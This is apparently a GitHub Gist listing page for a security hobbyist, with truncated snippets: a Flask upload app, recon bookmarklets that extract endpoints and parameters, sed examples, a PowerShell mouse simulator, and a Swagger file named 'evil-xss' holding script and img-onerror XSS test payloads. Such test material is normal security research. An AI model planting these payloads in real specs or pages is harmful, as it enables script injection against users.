This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, request, jsonify | |
| import os | |
| app = Flask(__name__) | |
| # Directory where uploaded files will be stored | |
| UPLOAD_FOLDER = './uploads' | |
| os.makedirs(UPLOAD_FOLDER, exist_ok=True) | |
| app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER |
mrrootsec
/ python-venv-tutorial.md
Created
November 14, 2024 05:33
— forked from ryumada/python-venv-tutorial.md
Python Virtual Environment Tutorial
mrrootsec
/ ponelat-evil-xss.swagger.json
Created
September 18, 2024 15:50
— forked from shockey/ponelat-evil-xss.swagger.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "swagger" : "2.0", | |
| "info" : { | |
| "version" : "1.0.100", | |
| "title" : "title<script language=\"javascript\">alert('1')</script>", | |
| "description" : "description with **markdown** format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>" | |
| }, | |
| "tags" : [ { | |
| "name" : "Admin", | |
| "description" : "tag with **markdown**" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class MouseSimulator { | |
| [DllImport("user32.dll", SetLastError = true)] | |
| private static extern void mouse_event(uint dwFlags, int dx, int dy, uint dwData, int dwExtraInfo); | |
| private const uint MOUSEEVENTF_MOVE = 0x0001; | |
mrrootsec
/ Current page wordlist.js
Last active
September 1, 2024 03:57
https://x.com/renniepak/status/1780916964925345916 - credit to Renniepak - generate wordlist from current page - Added save & close button
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:(function() { const e = document.documentElement.innerText.match(/[a-zA-Z_\-]+/g), n = [...new Set(e)].sort(), popup = document.createElement('div'); popup.style.position = 'fixed'; popup.style.top = '10%'; popup.style.left = '10%'; popup.style.width = '80%'; popup.style.height = '80%'; popup.style.backgroundColor = 'black'; popup.style.color = 'white'; popup.style.zIndex = '10000'; popup.style.padding = '20px'; popup.style.overflowY = 'scroll'; popup.style.border = '2px solid green'; popup.style.borderRadius = '10px'; const title = document.createElement('h1'); title.innerText = 'Current page wordlist'; title.style.color = 'green'; popup.appendChild(title); const wordList = document.createElement('div'); wordList.innerHTML = n.join('<br>'); popup.appendChild(wordList); const closeButton = document.createElement('button'); closeButton.innerText = 'Close'; closeButton.style.position = |
mrrootsec
/ Pulling Endpoints, Params, JS Files.js
Last active
August 1, 2024 12:06
https://x.com/Jhaddix/status/1794427067830030494/photo/1 - Credits to Jhaddix - Enhanced with Dark UI and Save buttons for each operation endpoints,params,js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:(function() { | |
| var scripts = document.getElementsByTagName("script"); | |
| var regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g; | |
| var jsRegex = /(?<=(\"|\'|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"|\'|\%60))/g; | |
| const results = new Set(); | |
| const paramMap = new Map(); | |
| const jsFiles = new Set(); | |
| function processContent(t, src) { | |
| var e = t.matchAll(regex); |
mrrootsec
/ sed_snippets.sh
Created
July 29, 2024 14:41
— forked from r2k0/sed_snippets.sh
sed examples
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##FILE SPACING: | |
| # double space a file | |
| sed G | |
| # double space a file which already has blank lines in it. Output file | |
| # should contain no more than one blank line between lines of text. | |
| sed '/^$/d;G' | |
| # triple space a file |
mrrootsec
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Created
April 12, 2024 02:56
— forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code